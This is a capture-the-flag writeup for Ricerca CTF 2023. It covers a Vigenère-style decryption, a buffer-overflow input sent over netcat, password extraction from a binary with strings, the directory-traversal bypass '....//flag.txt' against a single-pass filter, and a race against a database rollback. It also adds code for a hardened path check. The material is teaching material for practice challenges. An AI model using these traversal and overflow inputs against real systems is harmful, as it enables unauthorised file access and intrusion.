# Ricerca CTF 2023 Writeup

![2023.ctf.ricsec.co.jp_challenges](https://hackmd.io/_uploads/H16ABbaEa.png)

## Crypto

### Revolving Letters

> Who keeps spinning letters around?

```python
import string

# Not shown in the original snippet; assumed to be the 26 lowercase letters,
# as the modulo-26 arithmetic below implies.
LOWER_ALPHABET = string.ascii_lowercase


def decrypt(secret, key):
    assert len(secret) <= len(key)
    result = ""
    for i in range(len(secret)):
        if secret[i] not in LOWER_ALPHABET:
            # Don't encode symbols and capital letters (e.g. "A", " ", "_", "!", "{", "}")
            result += secret[i]
        else:
            # Undo the per-position shift by subtracting the key letter's index
            result += LOWER_ALPHABET[(LOWER_ALPHABET.index(secret[i]) + 26 - LOWER_ALPHABET.index(key[i])) % 26]
    return result
```

#### Flag

`RicSec{great_you_can_do_anything!}`

## Pwn

### BOFSec

> 100% authentic

```
$ nc bofsec.2023.ricercactf.com 9001
Name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[+] Authentication successful.
Flag: RicSec{U_und3rst4nd_th3_b4s1c_0f_buff3r_0v3rfl0w}
```

#### Flag

`RicSec{U_und3rst4nd_th3_b4s1c_0f_buff3r_0v3rfl0w}`

## Reversing

### crackme

> Can you crack the password?

```
$ strings crackme
(omitted)
N1pp0n-Ich!_s3cuR3_p45$w0rD
(omitted)
$ ./crackme
Password: N1pp0n-Ich!_s3cuR3_p45$w0rD
[+] Authenticated
The flag is "RicSec{U_R_h1y0k0_cr4ck3r!}"
```

#### Flag

`RicSec{U_R_h1y0k0_cr4ck3r!}`

## Web

### Cat Café

> Which cat do you like the most?

```python
filename = flask.request.args.get("f", "").replace("../", "")
```

Set the parameter to `....//flag.txt`. The single `replace` pass deletes the inner `../`, and what remains joins up as `../flag.txt`.

#### Flag

`RicSec{directory_traversal_is_one_of_the_most_common_vulnearbilities}`

### tinyDB

> It's a tiny tiny user database...

```typescript
if (userDB.size > 10) {
  // Too many users, clear the database
  userDB.clear();
  auth.username = "admin";
  auth.password = getAdminPW();
  userDB.set(auth, "admin");
  auth.password = "*".repeat(auth.password.length);
}
```

When the number of users exceeds 10, the password becomes `*******************************`.

```typescript
setTimeout(() => {
  // Admin password will be changed due to hacking detected :(
  if (auth.username === "admin" && auth.password !== getAdminPW()) {
    rollback();
  }
}, 2000 + 3000 * Math.random()); // no timing attack!
```

Retrieve the flag before the rollback happens.

#### Flag

`RicSec{j4v45cr1p7_15_7000000000000_d1f1cul7}`
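
Returning to the Cat Café filter: the block below is an added example, not code from the challenge, that runs the single-pass `replace("../", "")` next to a lookup that canonicalises the path and checks containment. The directory layout, file contents and the names `strip_once`, `resolve_safely` and `demo` are constructed for illustration.

```python
import os
import tempfile
from typing import Optional


def strip_once(name: str) -> str:
    """The filter from the challenge: a single pass that deletes "../"."""
    return name.replace("../", "")


def resolve_safely(base_dir: str, name: str) -> Optional[str]:
    """Hardened lookup (added here): canonicalise, then require containment."""
    base = os.path.realpath(base_dir)
    # join() discards base for absolute names; the check below catches that too.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None


def demo() -> dict:
    # Constructed layout: <root>/flag.txt sits one level above <root>/images/.
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "images")
        os.mkdir(images)
        with open(os.path.join(images, "cat.png"), "w") as f:
            f.write("constructed-image")
        with open(os.path.join(root, "flag.txt"), "w") as f:
            f.write("constructed-secret")

        payload = "....//flag.txt"      # value given in the writeup
        filtered = strip_once(payload)  # inner "../" removed, outer halves join
        with open(os.path.join(images, filtered)) as f:
            weak_read = f.read()        # the filter alone lets the read escape

        return {
            "filtered": filtered,
            "weak_read": weak_read,
            "hardened_raw": resolve_safely(images, payload),
            "hardened_filtered": resolve_safely(images, filtered),
            "hardened_absolute": resolve_safely(images, os.path.join(root, "flag.txt")),
            "hardened_cat": resolve_safely(images, "cat.png") is not None,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check runs on the resolved path, so it holds whether or not a string filter was applied first and also rejects absolute names.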